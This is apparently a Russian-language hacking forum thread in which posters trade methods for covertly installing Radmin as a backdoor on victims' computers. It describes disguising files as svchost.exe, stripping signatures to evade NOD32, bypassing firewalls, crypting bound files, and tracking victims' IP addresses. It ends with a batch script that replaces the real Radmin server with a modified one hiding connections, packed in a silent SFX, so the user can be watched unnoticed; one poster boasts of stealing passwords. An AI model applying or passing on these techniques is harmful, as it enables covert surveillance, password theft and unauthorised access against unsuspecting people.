Тема супер!
-И антивирусом (в часности NOD32 ) не палится, как было сказано в посте ...
-Доработал под себя, получился не плохой наборчик, всего из 4-х файлоф ...
svchost.exe (убрана иконка, которая настораживала своим видом когда в списке висят штук 8 svchost -ов и один из них ЧЁРНЫЙ ... )
set_time.bat (ранее знакомый нам как 111.bat но включающий в себя и команды reg add и заметания следов del всех перечисленных фалов, после их проработки
raddrv.dll (убрана подпись о том что она пренадлежит Remote Administrator)
AdmDll.dll

-Следующим этапом, буду клееть с Anti-Vypress-Chat -Который пользуется большой популярностью в наших локалках ...

-Есть одна только проблема:
Виндовозовский брадмауер, чётко обошли ...
А как быть с OutPost-ом
Пробовал создавать правило "исключение" для данного процесса (в OutPost) -ну типа -"разрешить данному приложению всё" ...
Затем сравнивал снимки реестра (TotallUninstall-ером), сделаные до, и после разрешения, (были изменения в некоторых его ветвях...) Но после "икуственного" импортирования этих пааметров, посредством bat-ника ну или файла.reg
-OutPost не принимает его в исключения (разрешённые программы)

-Может есть у кого, какие соображения на данную тему?

Народ, подскажите. Есть файл, склееный клеем SuperGlue, но он распознается как вирус. Чем его можно закриптовать, чтобы он не палился? )

Кто может выложить файлы от радмина raddrv.dll, AdmDll.dll не поляшийся nod32 ато они уменя уже палиться .

Не вижу обходимости выкладывать ... поскольку, установив Radmin, ты найдёшь в его папке, всё что ты ищешь ;-)

- Чтож за NOD у тебя такой?
У меня NOD32 c версией баз 2144 от 25 марта и них... не палит ....

У меня каждый день обновления на нод ,но тоже не палит ! Он палит только когда глубокий анализ делаешь , а так даже при запуске палит ? ха
Спс за эту инструкцию автору ! Наугарался я и пароли крал ,но че-то быстро надоедает так угарать !

У жертвы динамический ip, как сделать так, чтобы при выходе её в онлайн мне отсылался её новый адрес

установить у жертвы соответствующий софт. но в паблике я не припомню такого, в принципе такая прожка недолго пишется. метод для ленивых: сканить пул жертвы на открытый радмин порт =)

У меня с версий 2176 и палит без в сякого глубокава анализа, ранше да тока с глубоким палил.

Помогите доработать способ подмены настоящего файла радмины на поддельный, чтоб не пропалили.
Вобщем забацал я сервак радмина так что он при любом подключении синего цвета и даже если на него нажать он все равно пишет Нет соединений. Теперь надо подменить реальный на мой. Я делал так:

taskkill /im r_server.exe /f
del C:\WINDOWS\system32\r_server.exe
.
.
{эту строку я продублировал 100 раз}
.
.
del C:\WINDOWS\system32\r_server.exe
copy /y "r_server.exe" "%SYSTEMROOT%\system32\r_server.exe"
"%SYSTEMROOT%\system32\r_server.exe" /start
del C:\r_server.exe
del C:\start.bat

Затем сохраняю его с именем start.bat, пакую батник и мой файл сервака винраром в sfx. При упаковке настраиваю чтоб распаковывался на диск С. Ставлю галочку Скрывать все и перезаписывать существующие фалы.
Остается только приконектится к жертве через телнет и перепись файлов (ПРИ ЭТИХ ПОДКЛЮЧЕНИЯХ ЦВЕТ ИКОНКИ РАДИНА НЕ МЕНЯЕТСЯ). Закидываю файл, запускаю и отсоединяюсь. Через секунд 15 обратно присоединяюсь через Перепись файлов и снова копирую файл r_server.exe чтобы проверить подменился он или нет. Если это мой то все олично. Отключаю звук при подключении и можно смело наблюдать за действиями пользователя. Всегда когда я так делал все работало, НО на одном компе это не проходит. Не могу понять почему. Может кто подскажет как усовершенствовать этот метод?